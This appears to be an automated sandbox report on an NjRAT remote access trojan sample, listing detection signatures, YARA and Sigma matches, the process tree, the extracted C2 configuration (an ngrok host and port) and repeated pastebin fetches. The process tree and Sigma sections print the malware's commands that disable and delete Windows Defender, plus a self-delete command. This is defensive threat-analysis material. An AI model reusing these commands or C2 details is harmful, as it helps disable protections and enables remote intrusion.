Edit tour

Windows Analysis Report
G1lnGpOLK4.exe

Overview

General Information

Sample name:	G1lnGpOLK4.exe renamed because original name is a hash value
Original sample name:	97d72efbb1f6fea3f158b136c330689d.exe
Analysis ID:	1435109
MD5:	97d72efbb1f6fea3f158b136c330689d
SHA1:	43c884250ed032ced44d72d932518e831a34161d
SHA256:	2ff91319fbcc02e9dd7d80e21f5f7f48e0ae24b99a1b26625d344ab4812f37c4
Tags:	32exe
Infos:

Detection

Njrat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Njrat

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to log keystrokes (.Net Source)

Disables Windows Defender (via service or powershell)

Disables zone checking for all users

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies Windows Defender protection settings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

G1lnGpOLK4.exe (PID: 2472 cmdline: "C:\Users\user\Desktop\G1lnGpOLK4.exe" MD5: 97D72EFBB1F6FEA3F158B136C330689D)

cmd.exe (PID: 7904 cmdline: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7976 cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $true MD5: 04029E121A0CFA5991749937DD22A1D9)

WmiPrvSE.exe (PID: 5700 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 8176 cmdline: cmd /c sc query windefend MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7796 cmdline: sc query windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 8004 cmdline: cmd /c sc stop windefend MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8132 cmdline: sc stop windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 1364 cmdline: cmd /c sc delete windefend MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5788 cmdline: sc delete windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

chrome.exe (PID: 3652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
NjRAT	RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.	AQUATIC PANDA Earth Lusca Operation C-Major The Gorgon Group	http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/ http://blogs.360.cn/post/analysis-of-apt-c-37.html http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/ https://asec.ahnlab.com/1369	https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware Configuration

Threatname: Njrat

{"Host": "0.tcp.eu.ngrok.io", "Port": "18350", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "f2d4732908d59805d830a49d36974ac0", "Campaign ID": "Victim", "Network Seprator": "Y262SUCZ4UJJ"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0xab28:$a1: get_Registry 0xdbab:$a2: SEE_MASK_NOZONECHECKS 0xc93e:$a3: Download ERROR 0xdee7:$a4: cmd.exe /c ping 0 -n 2 & del "
00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xdbab:$a2: SEE_MASK_NOZONECHECKS 0xdf6f:$b1: [TAP] 0xdee7:$c3: cmd.exe /c ping
00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0xdbab:$reg: SEE_MASK_NOZONECHECKS 0xc91a:$msg: Execute ERROR 0xc97e:$msg: Execute ERROR 0xdee7:$ping: cmd.exe /c ping 0 -n 2 & del
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x93b8:$a1: get_Registry 0xc43b:$a2: SEE_MASK_NOZONECHECKS 0xb1ce:$a3: Download ERROR 0xc777:$a4: cmd.exe /c ping 0 -n 2 & del "
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0xa555:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Andromeda_MalBot_Jun_1A	Detects a malicious Worm Andromeda / RETADUP	Florian Roth	0xccad:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol 0xac18:$s2: svhost.exe
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0xc777:$x1: cmd.exe /c ping 0 -n 2 & del " 0xb02e:$s1: winmgmts:\\.\root\SecurityCenter2 0xb1f4:$s3: Executed As 0x9bdb:$s5: Stub.exe 0xb1ce:$s6: Download ERROR 0xaff0:$s8: Select * From AntiVirusProduct
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Unknown_Malware_Sample_Jul17_2	Detects unknown malware sample with pastebin RAW URL	Florian Roth	0xccad:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol 0xae42:$s2: https://pastebin.com/raw/ 0xcff7:$s3: My.Computer 0xcc87:$s4: MyTemplate
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xc43b:$a2: SEE_MASK_NOZONECHECKS 0xc7ff:$b1: [TAP] 0xc777:$c3: cmd.exe /c ping
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0xc43b:$reg: SEE_MASK_NOZONECHECKS 0xb1aa:$msg: Execute ERROR 0xb20e:$msg: Execute ERROR 0xc777:$ping: cmd.exe /c ping 0 -n 2 & del
00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0xc777:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0xb1aa:$s4: Execute ERROR 0xb20e:$s4: Execute ERROR 0xb1ce:$s5: Download ERROR 0xc7b5:$s6: [kl]
Process Memory Space: G1lnGpOLK4.exe PID: 2472	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x93b8:$a1: get_Registry 0xc43b:$a2: SEE_MASK_NOZONECHECKS 0xb1ce:$a3: Download ERROR 0xc777:$a4: cmd.exe /c ping 0 -n 2 & del "
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0xa555:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	Andromeda_MalBot_Jun_1A	Detects a malicious Worm Andromeda / RETADUP	Florian Roth	0xccad:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol 0xac18:$s2: svhost.exe
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0xc777:$x1: cmd.exe /c ping 0 -n 2 & del " 0xb02e:$s1: winmgmts:\\.\root\SecurityCenter2 0xb1f4:$s3: Executed As 0x9bdb:$s5: Stub.exe 0xb1ce:$s6: Download ERROR 0xaff0:$s8: Select * From AntiVirusProduct
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	Unknown_Malware_Sample_Jul17_2	Detects unknown malware sample with pastebin RAW URL	Florian Roth	0xccad:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol 0xae42:$s2: https://pastebin.com/raw/ 0xcff7:$s3: My.Computer 0xcc87:$s4: MyTemplate
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xc43b:$a2: SEE_MASK_NOZONECHECKS 0xc7ff:$b1: [TAP] 0xc777:$c3: cmd.exe /c ping
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0xc43b:$reg: SEE_MASK_NOZONECHECKS 0xb1aa:$msg: Execute ERROR 0xb20e:$msg: Execute ERROR 0xc777:$ping: cmd.exe /c ping 0 -n 2 & del
0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0xc777:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0xb1aa:$s4: Execute ERROR 0xb20e:$s4: Execute ERROR 0xb1ce:$s5: Download ERROR 0xc7b5:$s6: [kl]
0.2.G1lnGpOLK4.exe.1390000.1.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
0.2.G1lnGpOLK4.exe.1390000.1.unpack	Windows_Trojan_Njrat_30f3c220	unknown	unknown	0x75b8:$a1: get_Registry 0xa63b:$a2: SEE_MASK_NOZONECHECKS 0x93ce:$a3: Download ERROR 0xa977:$a4: cmd.exe /c ping 0 -n 2 & del "
0.2.G1lnGpOLK4.exe.1390000.1.unpack	RevengeRAT_Sep17	Detects RevengeRAT malware	Florian Roth	0x8755:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
0.2.G1lnGpOLK4.exe.1390000.1.unpack	Andromeda_MalBot_Jun_1A	Detects a malicious Worm Andromeda / RETADUP	Florian Roth	0xaead:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol 0x8e18:$s2: svhost.exe
0.2.G1lnGpOLK4.exe.1390000.1.unpack	CN_disclosed_20180208_c	Detects malware from disclosed CN malware set	Florian Roth	0xa977:$x1: cmd.exe /c ping 0 -n 2 & del " 0x922e:$s1: winmgmts:\\.\root\SecurityCenter2 0x93f4:$s3: Executed As 0x7ddb:$s5: Stub.exe 0x93ce:$s6: Download ERROR 0x91f0:$s8: Select * From AntiVirusProduct
0.2.G1lnGpOLK4.exe.1390000.1.unpack	Unknown_Malware_Sample_Jul17_2	Detects unknown malware sample with pastebin RAW URL	Florian Roth	0xaead:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol 0x9042:$s2: https://pastebin.com/raw/ 0xb1f7:$s3: My.Computer 0xae87:$s4: MyTemplate
0.2.G1lnGpOLK4.exe.1390000.1.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0xa63b:$a2: SEE_MASK_NOZONECHECKS 0xa9ff:$b1: [TAP] 0xa977:$c3: cmd.exe /c ping
0.2.G1lnGpOLK4.exe.1390000.1.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0xa63b:$reg: SEE_MASK_NOZONECHECKS 0x93aa:$msg: Execute ERROR 0x940e:$msg: Execute ERROR 0xa977:$ping: cmd.exe /c ping 0 -n 2 & del
0.2.G1lnGpOLK4.exe.1390000.1.unpack	MALWARE_Win_NjRAT	Detects NjRAT / Bladabindi	ditekSHen	0xa977:$s3: 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 20 00 2F 00 63 00 20 00 70 00 69 00 6E 00 67 0x93aa:$s4: Execute ERROR 0x940e:$s4: Execute ERROR 0x93ce:$s5: Download ERROR 0xa9b5:$s6: [kl]
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\G1lnGpOLK4.exe", ParentImage: C:\Users\user\Desktop\G1lnGpOLK4.exe, ParentProcessId: 2472, ParentProcessName: G1lnGpOLK4.exe, ProcessCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 7904, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7904, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 7976, ProcessName: powershell.exe

Sigma detected: SC.EXE Query Execution

Source: Process started

Author: frack113: Data: Command: sc query windefend, CommandLine: sc query windefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c sc query windefend, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8176, ParentProcessName: cmd.exe, ProcessCommandLine: sc query windefend, ProcessId: 7796, ProcessName: sc.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: G1lnGpOLK4.exe

Avira: detected

Found malware configuration

Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack

Malware Configuration Extractor: Njrat {"Host": "0.tcp.eu.ngrok.io", "Port": "18350", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "f2d4732908d59805d830a49d36974ac0", "Campaign ID": "Victim", "Network Seprator": "Y262SUCZ4UJJ"}

Multi AV Scanner detection for domain / URL

Source: 0.tcp.eu.ngrok.io	Virustotal: Detection: 16%			Perma Link
Source: 0.tcp.eu.ngrok.io	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for submitted file

Source: G1lnGpOLK4.exe	ReversingLabs: Detection: 68%
Source: G1lnGpOLK4.exe	Virustotal: Detection: 70%			Perma Link

Yara detected Njrat

Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

Machine Learning detection for sample

Source: G1lnGpOLK4.exe

Joe Sandbox ML: detected

Source: G1lnGpOLK4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49745 version: TLS 1.0

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2

Source: G1lnGpOLK4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 0.tcp.eu.ngrok.io

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	TCP traffic: 192.168.2.4:49749 -> 18.192.31.165:15155
Source: global traffic	TCP traffic: 192.168.2.4:49777 -> 3.124.142.205:15155

Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 3.124.142.205 3.124.142.205
Source: Joe Sandbox View	IP Address: 18.192.31.165 18.192.31.165

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49745 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 104.118.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
